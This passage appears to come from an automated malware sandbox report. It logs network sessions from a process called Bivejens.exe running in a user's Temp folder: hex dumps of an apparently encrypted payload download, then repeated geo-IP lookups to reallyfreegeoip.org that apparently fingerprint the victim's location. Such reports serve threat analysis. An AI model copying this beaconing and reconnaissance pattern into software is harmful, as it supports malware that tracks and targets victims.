                                                                                                                        2025-01-10 23:41:17 UTC1324INData Raw: 4a 47 ea 12 00 19 33 f0 9f 74 cb 56 7e 10 22 f8 90 4a e0 7e e0 02 61 4d 1f 2b f7 31 20 ba 00 a7 e2 6a 8c f9 d3 2e 8c 19 01 18 16 8c e5 3a 7d 9c 04 b2 33 c5 88 87 20 80 f3 5e 6f 53 1b cc 1c 9a ee ef 4b 00 06 8c 9c a4 ef 41 30 fc 16 a9 a6 5b fd 1b be c4 5e 4a 56 aa 80 0f db 51 76 59 f1 5b cd 3c 63 c7 e3 dd 2a 8c 9e 49 14 c4 ea 5f c0 7d 43 1b 46 a1 1d 9e 5c 5c b8 d7 14 ee 89 c7 d7 bc 6d 71 ef c9 3f 86 a5 fe 71 a0 d9 98 6f b7 97 3e ba ec c4 85 fd 21 f2 f5 d7 8d a0 ed 46 7d d7 10 58 e2 64 8a 07 39 c1 c1 5b 4a a2 9a dc ae e6 37 99 08 2f b1 f5 ee be 95 70 93 f2 eb ea 33 0d e8 24 b9 ec 90 63 cd cc b4 38 3e 1f 9c 43 a6 53 59 1e a8 36 0f 1c e7 19 a5 6b 76 84 35 f5 34 83 aa 62 2b 03 ab 5d 48 59 e5 67 96 fc 11 de 79 e7 8f 29 1d 78 87 24 75 c9 6d e7 6d dc 98 91 aa 8a
                                                                                                                        Data Ascii: JG3tV~"J~aM+1 j.:}3 ^oSKA0[^JVQvY[<c*I_}CF\\mq?qo>!F}Xd9[J7/p3$c8>CSY6kv54b+]HYgy)x$umm
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: dc c5 12 13 9d 54 2b 87 99 18 2c 5b 2a a2 6b a9 ee 84 6c f1 63 61 ba 43 39 e8 96 55 27 0e 10 1c 7f df f1 5d 8c 91 fc 3a e8 40 ed 34 21 ea 4d 64 b8 51 04 e1 f0 8d e3 65 45 40 ff a6 5b f3 1b b3 a4 2c ea 53 b9 ee df 73 3f 76 29 85 2b 91 3c 67 e5 a7 d5 23 08 85 8b 69 01 9a 77 89 7d 43 15 38 79 0c 8a 7e 0a bc c6 16 e7 42 4f 58 d5 02 0a c7 fd 35 86 be e9 01 11 f1 fa 65 b7 43 ee ba fd c0 a9 f5 4e c2 9a d6 89 d2 b0 44 a1 79 15 55 42 50 8a 0d 25 2c c5 48 42 d1 ba e5 6a 3b 5f 9f 20 75 b1 f5 e4 dd 2a 30 93 f6 98 98 27 7f cc 3d 91 14 32 46 d0 f2 f1 39 2d 13 2f 60 87 e2 35 11 a8 38 82 39 fe 63 ef 5a 74 80 e7 c6 06 79 38 6d 21 65 f7 79 40 20 de 60 af c8 b2 fb 65 95 3b d8 1b 35 25 0c 0f ba aa ed 02 8a b0 59 a0 99 2b 30 ba 59 ad fe 58 9e 04 01 83 c4 02 a6 4f fe 3b 9c 4e
                                                                                                                        Data Ascii: T+,[*klcaC9U']:@4!MdQeE@[,Ss?v)+<g#iw}C8y~BOX5eCNDyUBP%,HBj;_ u*0'=2F9-/`589cZty8m!ey@ `e;5%Y+0YXO;N
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: df 17 7b 01 e0 4c ce 7d 6b 71 29 67 17 43 6d 4b bc c6 10 e7 9f b0 6b d5 02 2b 9d 9e 37 86 c4 ec 36 99 d9 98 6f a1 b7 31 a9 f8 d1 ac cc 71 f7 9a d6 8d b4 19 40 9c 09 03 7b b9 97 8a 07 39 fa 0c 5b 62 ca 9a af 6d 3b 5f 95 1b 29 a0 f3 90 fa a7 70 97 85 53 bd 31 07 f7 f9 91 64 9a 63 d6 dc 25 f5 2d 19 87 3b a2 90 5b 1a c7 85 20 1c ed 1d c6 5c 06 fe 55 e3 6c 23 11 62 21 1f 27 cc 4b 5e 84 48 f4 cc 10 d4 16 29 9b d7 11 45 96 22 68 37 ea e7 6d d7 95 4f d8 48 19 2b 47 bb 88 e9 71 00 12 73 5d 74 27 ce 9f b5 23 b4 85 d3 0e 6d fb ad a0 7f 78 a5 12 6e 22 9c 39 77 f8 0a 9b fd a9 a5 98 6b ca 2f ac fd 9d 1a 0f c4 6c 9b a2 d7 b2 8f 28 53 51 3f a5 e8 66 ba 7d d9 88 01 e0 a5 ea c0 8f 37 b6 db c8 95 f8 1a 00 0a cf ad 9e 1a d8 18 60 c6 a5 97 e7 ce cf f0 25 e5 35 b6 cf 4d 93 44
                                                                                                                        Data Ascii: {L}kq)gCmKk+76o1q@{9[bm;_)pS1dc%-;[ \Ul#b!'K^H)E"h7mOH+Gqs]t'#mxn"9wk/l(SQ?f}7`%5MD
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: 32 52 9f 24 6f 65 cf 9d d6 ae 0f 39 2d 18 a5 71 9f 90 51 c0 6e 68 13 1c ed 9d ff d1 74 84 4f 99 1b 27 ac 4a 43 15 55 56 5b 74 f4 61 bf cc 10 df 79 e6 9b 5e 85 45 8b ae 73 ba aa f4 5d d2 b0 05 aa 8a 0a 0b 37 19 bc fe 44 36 52 73 57 d7 27 c0 9f 27 38 b4 85 d3 0e 63 ad 2e a0 7f 76 a5 12 6c 22 2c 26 77 f8 0a 96 98 d7 9d 92 04 01 8d 89 ed ef f6 2b c4 1c 3d f4 38 cc 93 22 40 52 41 56 87 be b0 df f6 85 74 a7 6b ea b0 27 1f b4 e7 c8 9f f7 41 6c 0a cf ad 8a 7d fa 29 60 cc ad ed ba e7 cf 86 19 d6 8d bf cf 89 82 ba d7 c2 58 89 2a 91 da bb 9f 04 47 e9 c0 38 73 49 f1 b9 9e 87 ff 9f 76 cb ff 89 4d 76 f3 61 36 48 ef 7c c1 d6 a8 70 97 13 22 4e cc b3 66 1b 3a 84 f7 28 e5 f6 21 00 db 52 94 d0 86 99 66 98 39 36 c7 b9 05 1a 0c 2c 4c 57 9b 36 b3 85 5c b8 81 2a d3 95 06 7a 2d
                                                                                                                        Data Ascii: 2R$oe9-qQnhtO'JCUV[tay^Es]7D6RsW''8c.vl",&w+=8"@RAVtk'Al})`X*G8sIvMva6H|p"Nf:(!Rf96,LW6\*z-
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: 71 21 74 a5 95 ac 7f 7c 2f 49 74 50 48 29 66 9c 80 68 81 a9 af 81 12 77 0b bd f7 ed 1a 09 c4 6c 9b a3 09 a3 8f 52 51 40 06 7f 87 be b0 6e c4 eb 3a 9e 7f 9a e8 d3 37 c8 ed db 8d ed 71 a2 7f c8 a7 fd 7d 7b 29 60 cc a1 cd ea cc cf 8a 22 da d2 ea cf 47 8f a9 ce f2 40 fb b3 80 a4 d7 f0 da 43 86 3f 38 62 5b 92 fa 11 ee e5 e6 81 43 ff 83 47 71 15 0d dc 4e d6 da d5 cc b9 14 b5 0a 34 5b a7 6a 0d 74 14 92 df aa e5 e7 31 79 94 53 9f dd bf ac 7f f7 d8 22 17 e6 16 01 1c 1f 0e d7 9b 3c cb a4 56 a9 eb 4e ee 96 06 70 3f 0e 23 3e 91 6d 93 f7 c1 2b 44 1d 4d 79 e1 3f e3 2e 17 f6 95 80 c0 52 b4 5a 67 04 f1 8b d2 ff 50 fb c4 9a 83 cd 3e 9a 67 a3 25 91 60 db 17 89 b1 61 35 17 39 ba 08 38 67 9f e3 9b 6d 5d ae 85 61 0c 53 47 7d 8a 87 dd fe 96 75 0c 26 9d ce 90 4f 33 3a 86 ab 14
                                                                                                                        Data Ascii: q!t|/ItPH)fhwlRQ@n:7q}{)`"G@C?8b[CGqN4[jt1yS"<VNp?#>m+DMy?.RZgP>g%`a598gm]aSG}u&O3:
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: d7 e3 52 f7 70 91 a4 a3 b7 4e 43 86 3f 46 6c 43 83 e7 b7 cd 8f 89 54 e1 eb 9d 53 48 cc 62 3c 44 a2 58 c6 d6 a9 05 a4 14 50 3a ae e4 14 74 88 92 df aa e5 f1 55 54 25 53 9b a9 fc bd 67 9c 4a e1 17 ec 0f 75 c9 04 61 5d 9b 14 9b b7 4c b2 ec b0 1e 96 06 7b 09 04 40 3e e8 ef e3 55 ee 2f 71 b7 51 16 59 9d c6 3c 65 89 80 ef 01 f0 91 49 19 2d ea e4 34 5d 75 eb b6 a1 b8 0e 4e 38 42 b8 5b a7 48 a6 13 2b 9e 7d 67 3f 23 ba 78 b2 31 e3 e3 91 67 2e 7f c5 61 06 5e 65 63 76 43 bc 91 23 5d 4e 2c 9d c8 35 05 e2 44 c3 a1 19 31 a8 59 75 4e 63 03 a1 87 e5 3f cb 4e 52 8d fa e4 db 8f 81 98 cb 4c 24 04 5c ac 41 af e6 eb 5e 83 14 b3 1b 2e 68 c2 35 78 57 03 fb d7 ef 3c b4 d8 92 59 6d b5 08 f3 c3 ac fe 82 e3 93 17 1c a7 d1 c4 a4 25 59 61 ef f2 66 f9 5a 68 af 95 2e 80 e2 fd 2c 58 39
                                                                                                                        Data Ascii: RpNC?FlCTSHb<DXP:tUT%SgJua]L{@>U/qQY<eI-4]uN8B[H+}g?#x1g.a^ecvC#]N,5D1YuNc?NRL$\A^.h5xW<Ym%YafZh.,X9
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: 54 32 22 fa 4d b6 ed b9 c0 48 0c 21 b4 76 24 f8 a9 57 e7 8f ee 54 44 c6 2a 77 15 9a 46 15 e8 78 4a c4 9a b1 ac 1b 82 15 45 33 87 38 04 32 90 93 da 15 17 3f 18 2d 0a 6b cb f1 91 1d e3 0b b9 61 0c 58 c0 43 84 2a d6 f4 f5 42 3c 06 8a c8 42 14 3b 44 c3 af 3c 71 a0 4f 77 b2 a2 7e ff f7 cd 76 cb 47 3b 2d e5 f5 c4 a7 1a 94 cb 43 08 de 2a c2 40 af c3 c9 6a 5f ca aa 2d 26 5c ea 57 72 44 0d 25 ff 8d 3c b4 d2 31 12 6b b5 0c 81 94 ae 80 c0 f5 bb 9b 6e f0 d9 d2 2a 32 62 c8 fe d3 55 21 a4 69 bc b8 65 85 db 2b 33 d5 79 04 ae 34 e4 cb cb 54 8b 61 19 c6 be a1 ee b4 5b c5 5a e1 70 b3 22 5d 3a 7a 2f 4d da 9d 53 d7 c9 ff 09 9c 50 f1 81 05 0c f2 44 78 b1 c2 cd d7 75 a8 d2 85 f6 4c 0e 2b 6e aa 32 97 5e 7b 51 6f 05 54 0c 2e 4c 3d 2a 55 8f f9 6e a4 2a 6c 29 d0 84 b1 e1 78 33 0e
                                                                                                                        Data Ascii: T2"MH!v$WTD*wFxJE382?-kaXC*B<B;D<qOw~vG;-C*@j_-&\WrD%<1kn*2bU!ie+3y4Ta[Zp"]:z/MSPDxuL+n2^{QoT.L=*Un*l)x3
                                                                                                                        2025-01-10 23:41:17 UTC1390INData Raw: 57 6f 4f 7d ca 0a 12 c3 87 e5 31 b8 97 3d 3c f0 f7 d9 f1 6e 94 cb 41 7a 54 57 c3 30 b9 ce 69 5e 5f c0 b6 c0 07 4f cb 24 7b 68 0b ea f7 9a 53 65 d2 4f 2c 6b b5 23 f8 c3 bd 88 a6 8c 42 13 6e fa d3 c4 c5 3b 0f d7 ef f2 68 c7 76 69 bc 9a 50 56 db 21 24 58 28 0c d0 0f c1 dd bd 36 a6 61 69 60 e8 75 c6 0f 51 aa 84 43 55 a1 50 22 3d 6b 58 80 2a 84 2d e5 c9 ee 0a 51 a3 eb f3 34 0f 2c 24 ff bc ed b3 f7 7f bb dc 27 fb 32 7c 03 72 74 42 35 76 07 2f 41 0f 3b 54 5c f4 27 39 07 82 5c a6 a4 2a 67 1a 38 f7 98 fd 69 48 95 b1 c7 a5 98 d2 e7 4f 9d e5 bf fa 33 48 37 9a 10 05 ca e8 b3 c2 50 d3 a5 06 d9 87 d9 75 64 88 4c d5 75 bb c8 33 3e 2f 26 58 b4 08 c4 3f a9 57 09 b1 4b b3 87 8e 07 0e 29 2d 08 21 74 bb 4c 7d bb c2 88 08 38 d6 51 b8 42 f1 1c ff 40 ab 02 2a 66 48 99 e6 db 94
                                                                                                                        Data Ascii: WoO}1=<nAzTW0i^_O${hSeO,k#Bn;hviPV!$X(6ai`uQCUP"=kX*-Q4,$'2|rtB5v/A;T\'9\*g8iHO3H7PudLu3>/&X?WK)-!tL}8QB@*fH


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.1049925104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:19 UTC861INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:19 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867268
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wpmn8kdahvDa9QPk1bxQLy5NCdpXq%2Bs0XzbR8k2LbSfYHz95EWLEZcdy7rUUvaZ%2FrUtzKsVSOfsF%2BknMFbVR1DYUnbeue9C2FN4G%2FSvbF5zLhtVzT0yFjFnm9%2BYH42O4Y4o62N%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 900084669ced42d2-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1546&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1801357&cwnd=229&unsent_bytes=0&cid=8973a98ef2e38a47&ts=145&x=0"
                                                                                                                        2025-01-10 23:41:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.1049931104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:20 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2025-01-10 23:41:20 UTC859INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:20 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867269
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqR7iS8TVoK5Upbc%2BZkvo67MGx8AkZWQzJ6FoRULSNQRV9%2FXoZN6V8%2BAHqO6a8mK4PrCaM3QWaSK9E3hiESqznbKEE%2FxbicTrh28vjTJDr3wYIxP0z3Eeqo9Sv%2B2OTXPR4hhfGzE"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 9000846bd8427d0e-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2010&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1443400&cwnd=244&unsent_bytes=0&cid=9fcd96128474ef84&ts=160&x=0"
                                                                                                                        2025-01-10 23:41:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.1049943104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2025-01-10 23:41:21 UTC851INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:21 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867271
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6N9FVCppExYyvMhzuhG4FgZjxWEYA7PaKRHXTsUlPRSyQralnZ1B2dmFqBrYiJg9pyZnedP6EDSLCZIWZl3oCxVVXUE%2FWeD5UCrBRPaKZmpvI1CiXFBBqW90GLVaT29xfnftWzz"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 90008473ddbbc443-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1636&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1664766&cwnd=244&unsent_bytes=0&cid=5314cae19f923634&ts=147&x=0"
                                                                                                                        2025-01-10 23:41:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.1049954104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:23 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2025-01-10 23:41:23 UTC855INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:23 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867272
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVtZkLvZSrG8ptTPwaXoOWYIH2Eyzpk2KcU7UsaT2z%2Bx62BExEOsTASoj9gsUVfxg8pvtsHUTtRzUfY5yHJT1%2Bcm8x2FXJtEgPDesLwlrHS2HUuBwSc8oDCjmuAdS5eNjs7pWc%2Fz"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 9000847c1bb68c0f-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1936&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1508264&cwnd=223&unsent_bytes=0&cid=6befbbbbfb077b55&ts=157&x=0"
                                                                                                                        2025-01-10 23:41:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.1049963104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:24 UTC857INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:24 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867273
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q230yz2XQ%2BLLPO1azW6L32lGjy1uFgtbNoa3Y4cRh8au1%2B6nI9os%2F44VJd8OXhL9dgCsPk%2FfXib1Fagg0f3bBgsga4HAofRXCIWeNHqHycYCEg1hh3RN1AdBXZAlAuuXQDKYzBmL"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 90008484bef443ee-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1706&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1664766&cwnd=228&unsent_bytes=0&cid=c12c5a8d82f80d66&ts=188&x=0"
                                                                                                                        2025-01-10 23:41:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.1049974104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2025-01-10 23:41:25 UTC859INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:25 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867275
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
